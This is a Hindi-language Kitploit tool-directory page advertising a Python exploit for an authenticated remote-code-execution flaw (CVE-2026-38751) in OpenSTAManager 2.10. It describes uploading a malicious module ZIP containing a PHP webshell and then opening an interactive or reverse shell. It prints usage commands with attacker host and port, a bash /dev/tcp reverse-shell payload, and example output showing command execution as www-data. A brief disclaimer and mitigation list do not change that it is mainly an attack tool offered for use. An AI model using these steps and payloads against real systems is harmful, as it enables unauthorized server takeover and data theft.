Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — OpenSTAManager RCE Exploit (CVE-2026-38751) | Kitploit
उपकरण/GitHubGitHub/hackthem/openstamanager_rce_exploit-cve-2026-38751-
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलशेलकोड जनरेशन
GitHubhackthem/openstamanager_rce_exploit-cve-2026-38751-

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

OpenSTAManager RCE Exploit (CVE-2026-38751)

रिपॉजिटरी देखें
1183 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

OpenSTAManager RCE एक्सप्लॉइट (CVE-2026-38751)

अवलोकन

यह Python स्क्रिप्ट OpenSTAManager संस्करण 2.10 में Remote Code Execution (RCE) भेद्यता का शोषण करती है, जिसे CVE-2026-38751 के रूप में पहचाना गया है। यह एक्सप्लॉइट प्रमाणित उपयोगकर्ताओं को एक दुर्भावनापूर्ण मॉड्यूल अपलोड करने और लक्षित सिस्टम पर मनमाने कमांड निष्पादित करने की अनुमति देता है।

भेद्यता विवरण

  • CVE ID: CVE-2026-38751
  • उत्पाद: OpenSTAManager
  • संस्करण: 2.10
  • प्रकार: Remote Code Execution (RCE)
  • हमला वेक्टर: वेब-आधारित, वैध प्रमाणीकरण की आवश्यकता है

एक्सप्लॉइट कैसे काम करता है

एक्सप्लॉइट निम्नलिखित चरणों का पालन करता है:

  1. प्रमाणीकरण: प्रदान किए गए क्रेडेंशियल का उपयोग करके OpenSTAManager एप्लिकेशन में लॉग इन करता है
  2. अपडेट सक्षम करें: मॉड्यूल अपडेट कार्यक्षमता को सक्रिय करता है, जो एक्सप्लॉइट के लिए आवश्यक है
  3. दुर्भावनापूर्ण ZIP बनाएं: एक ZIP फ़ाइल उत्पन्न करता है जिसमें शामिल हैं:
    • एक मॉड्यूल परिभाषा फ़ाइल (MODULE)
    • एक PHP शेल स्क्रिप्ट (shell.php) जो GET पैरामीटर c के माध्यम से कमांड निष्पादित करती है
  4. मॉड्यूल अपलोड करें: मॉड्यूल अपडेट इंटरफ़ेस के माध्यम से दुर्भावनापूर्ण ZIP अपलोड करता है
  5. शोषण सत्यापित करें: पुष्टि करता है कि शेल सुलभ और कार्यात्मक है
  6. कमांड निष्पादित करें: या तो:
    • मैन्युअल कमांड निष्पादन के लिए इंटरैक्टिव शेल मोड
    • स्थायी कनेक्शन स्थापित करने के लिए रिवर्स शेल कनेक्शन

पूर्वापेक्षाएँ

  • Python 3.x
  • आवश्यक Python पैकेज: requests, zipfile
  • OpenSTAManager के लिए वैध व्यवस्थापक क्रेडेंशियल
  • लक्षित सिस्टम तक नेटवर्क पहुंच

उपयोग

मूल उपयोग

python3 exploit.py -u http://target.com -U admin -P password

इंटरैक्टिव शेल मोड

python3 exploit.py -u http://target.com -U admin -P password --interactive

रिवर्स शेल मोड

python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444

आर्ग्युमेंट्स

आर्ग्युमेंटविवरण
-u, --urlलक्षित URL (आवश्यक)
-U, --userप्रमाणीकरण के लिए उपयोगकर्ता नाम (आवश्यक)
-P, --passwordप्रमाणीकरण के लिए पासवर्ड (आवश्यक)
--interactiveइंटरैक्टिव शेल मोड में प्रवेश करें
--no-cleanupनिष्पादन के बाद शेल फ़ाइलें न हटाएं
--lhostरिवर्स शेल के लिए स्थानीय होस्ट
--lportरिवर्स शेल के लिए स्थानीय पोर्ट

तकनीकी विवरण

शोषण प्रक्रिया

  1. प्रमाणीकरण: स्क्रिप्ट एप्लिकेशन के प्रमाणीकरण एंडपॉइंट पर लॉगिन अनुरोध करती है
  2. मॉड्यूल अपडेट सक्षमीकरण: मॉड्यूल अपडेट कार्यक्षमता सक्षम करने के लिए POST अनुरोध भेजता है
  3. ZIP निर्माण: एक ZIP आर्काइव बनाता है जिसमें:
    • shell/MODULE: मॉड्यूल कॉन्फ़िगरेशन फ़ाइल
    • shell/shell.php: PHP वेबशेल जो GET पैरामीटर c के माध्यम से पास किए गए कमांड निष्पादित करती है
  4. अपलोड प्रक्रिया: दुर्भावनापूर्ण ZIP को मॉड्यूल अपडेट एंडपॉइंट पर अपलोड करने के लिए मल्टीपार्ट फॉर्म डेटा का उपयोग करता है
  5. सत्यापन: यह पुष्टि करने के लिए कि यह कार्यशील है, id जैसे सरल कमांड को निष्पादित करके अपलोड की गई शेल का परीक्षण करता है
  6. कमांड निष्पादन: या तो इंटरैक्टिव शेल प्रदान करता है या रिवर्स शेल कनेक्शन स्थापित करता है

उपयोग किए गए पेलोड

एक्सप्लॉइट कई रिवर्स शेल पेलोड का प्रयास करता है:

  • Bash रिवर्स शेल: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
  • सॉकेट कनेक्शन का उपयोग करने वाले Python रिवर्स शेल
  • Base64 एन्कोडेड bash पेलोड
  • Netcat रिवर्स शेल

सुरक्षा संबंधी विचार

⚠️ अस्वीकरण: यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।

जोखिम मूल्यांकन

यह भेद्यता निम्नलिखित की अनुमति देती है:

  • वेब सर्वर उपयोगकर्ता के रूप में मनमाना कोड निष्पादन
  • संभावित विशेषाधिकार वृद्धि
  • सिस्टम पर संग्रहीत संवेदनशील डेटा तक पहुंच
  • नेटवर्क के भीतर संभावित लैटरल मूवमेंट

शमन

इस भेद्यता से सुरक्षा के लिए:

  1. OpenSTAManager को नवीनतम संस्करण में अपडेट करें
  2. उचित प्रमाणीकरण नियंत्रण लागू करें
  3. फ़ाइल अपलोड क्षमताओं को प्रतिबंधित करें
  4. संदिग्ध गतिविधि की निगरानी करें
  5. नेटवर्क सेगमेंटेशन लागू करें

उदाहरण आउटपुट

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami

[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit

संदर्भ

  • GitHub रिपॉजिटरी
  • CVE विवरण

लाइसेंस

यह एक्सप्लॉइट केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के विरुद्ध अनधिकृत उपयोग, जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध है।

टूल डाउनलोड करें